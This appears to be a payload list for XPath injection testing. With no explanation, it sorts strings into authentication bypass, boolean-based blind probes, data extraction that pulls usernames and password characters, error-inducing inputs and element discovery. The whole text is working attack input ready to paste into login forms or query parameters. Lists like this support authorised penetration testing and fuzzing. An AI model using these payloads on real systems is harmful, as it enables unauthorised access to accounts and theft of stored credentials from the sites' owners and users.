# XPath Injection Payloads

# Basic injection
' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
'] | //user/*[contains(*,'
') or ('x'='x
1 or 1=1
' and '1'='1
admin' or '1'='1' or 'a'='a

# Authentication bypass
' or '1'='1' or ''='
admin'/*
admin'--
' or 1]/*|//*['
' or 1=1 or ''='
admin' or '1'='1
x]|//user[username='admin' and password='
admin']/*|//*['

# Boolean-based blind
' or string-length(name(parent::*[position()=1]))>0 or 'a'='b
' or string-length(name(parent::*[position()=1]))>100 or 'a'='b
' or count(//user)>0 or 'a'='b
' or count(//user)>1000 or 'a'='b
' or boolean(//user) or 'a'='b
' or not(boolean(//nonexistent)) or 'a'='b

# Data extraction
' or //user[1]/username/text()='' or ''='
' or //user[1]/password/text()='' or ''='
' or name(//*)='' or ''='
' or //*/text()='' or ''='
' or local-name(/*)='' or ''='

# Function-based
' or string-length('')=0 or ''='
' or normalize-space('')='' or ''='
' or concat('a','b')='ab' or ''='
' or contains('test','t') or ''='
' or starts-with('test','t') or ''='
' or position()>=1 or ''='
' or last()>=1 or ''='

# Error-inducing
'
"
'--
"--
'/*
']
')
' or
' and
') or ('
'] or ['
']]

# Node count extraction
' or count(parent::*[position()=1])=0 or 'a'='b
' or contains(name(parent::*[position()=1]),'a') or 'a'='b
' or substring(//user[1]/password,1,1)='a' or 'a'='b

# Namespace and element discovery
' or name(//*)='' or ''='
' or namespace-uri(//*)='' or ''='
' or local-name(//*)='' or ''='
